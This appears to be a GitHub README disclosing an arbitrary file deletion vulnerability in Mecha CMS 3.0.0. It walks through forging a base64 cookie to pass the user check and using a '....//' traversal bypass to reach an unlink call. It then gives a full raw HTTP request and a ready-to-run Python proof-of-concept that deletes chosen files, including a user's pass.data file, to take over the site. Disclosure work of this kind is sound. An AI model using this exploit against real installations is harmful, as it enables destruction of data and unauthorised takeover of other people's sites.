Skip to content

Sp1d3rL1/Mecha-cms-Arbitrary-File-Deletion-Vulnerability

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 

Repository files navigation

Mecha-cms-Arbitrary-File-Deletion-Vulnerability

The Arbitrary File Deletion Vulnerability was found in file: ./lot/x/panel/index/panel/type/page/page.php::13 , this file can be required by another file, thus bypassing the CMS check on the legitimacy of the user's identity, the parameter $x is not reasonably filtered, leading to the vulnerability.

Information

Code from: https://github.com/mecha-cms/mecha/archive/refs/tags/v3.0.0.tar.gz → mecha-3.0.0.tar.gz

https://github.com/mecha-cms/x.panel/archive/refs/tags/v3.0.0.tar.gz → penal_extention_for_3.0.0

https://github.com/mecha-cms/x.user/archive/refs/tags/v2.0.0.tar.gz → user_extention_for_3.0.0

Version: mechaCMS 3.0.0

Summarize: Attackers can construct elaborate cookies that bypass mecha CMS’s checks for the existence of a user's identity, attackers can also construct elaborate URIs that bypass mecha CMS’s checks for the legitimacy of a user's identity. Eventually, parameters are passed through the POST method, resulting in the deletion of arbitrary files.

Steps

Construct the HTTP request and the parameters as follows. Among them, the Path parameter of the request line, the POST request body parameter, and the cookies are elaborated. image

In ./lot/x/user/engine/plug/hook.php , there is a check for the existence of user: image

To reverse the execution logic of the cookie('user.name') function, you can manually set the cookie so that this function returns a specified path:

image

When Ii4uL3kvbG9nL2Fib3V0Ig== is set as a cookie value, the resulting path is "../y/log/about": image

Because /var/www/html/mecha/lot/user/../y/log/about.page is a legal file: image

When the code executes to ./lot/x/panel/index.php , $user->exist is not empty, it will be the path specified in the above step.

Even though it's not the user's .page file, we can still go to panel.php. image

By triggering the Hook, we can access the route.php file: image

The *'path'* in $_ does the string splicing in the loop and passes in the variable $f, which is required once per loop, so ./lot/x/panel/index/panel/route/../type/page/page.php file is successfully required. image

mechaCMS does employ some measures to prevent directory traversal, but this can still be bypassed: image

Just use ‘….//’ in 'path' which becomes to '../’ after being filtered.

Ultimately, in page.php, when the POST parameter is as shown, the unlink function removes any file specified in $_POST['page']['x'] image

I deleted del.abc from a web root directory to test the effectiveness of the exploit: image

Deleted successfully.

Once the username of mechaCMS is known (admin is used as an example in the picture below), anyone can take over mechaCMS by deleting the user's authentication file, which is horrible! image

Just like this, pass.data is also deleted.

image

Payload

HTTP Request:

POST http://192.168.0.155/mecha/panel/fire/boos/....//type/page/page HTTP/1.1
Host: 192.168.0.155
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://192.168.0.155
DNT: 1
Connection: close
Referer: http://192.168.0.155/mecha/panel/fire/boos/....//type/page/page
Cookie: PHPSESSID=u14i9od14jlv8puvef8grcpfhc; *3759209392=Ii4uL3kvbG9nL2Fib3V0Ig%3D%3D
Upgrade-Insecure-Requests: 1
Priority: u=0, i

data%5Bchunk%5D=0&page%5Bx%5D=%2Fvar%2Fwww%2Fhtml%2Fmecha%2Fdel.abc&page%5Bchunk%5D=1

Python3 poc:

import requests

ip = "192.168.0.155" # change it
delfile= "/var/www/html/mecha/del.abc" # change it

url = "http://{}/mecha/panel/fire/boos/....//type/page/page".format(ip)
headers = {
    "Host": ip,
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://{}".format(ip),
    "DNT": "1",
    "Connection": "close",
    "Referer": "http://{}/mecha/panel/fire/boos/....//type/page/page".format(ip),
    "Cookie": "PHPSESSID=u14i9od14jlv8puvef8grcpfhc; *3759209392=Ii4uL3kvbG9nL2Fib3V0Ig%3D%3D",
    "Upgrade-Insecure-Requests": "1",
    "Priority": "u=0, i"
}

data = {
    "data[chunk]": "0",
    "page[x]": delfile,
    "page[chunk]": "1"
}
# POST request
response = requests.post(url, headers=headers, data=data)

# status code could be 405, but the file will be deleted successfully(Make sure you have deletion privileges!)
print(response.status_code)

About

Description about Mecha-cms' vulnerability

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published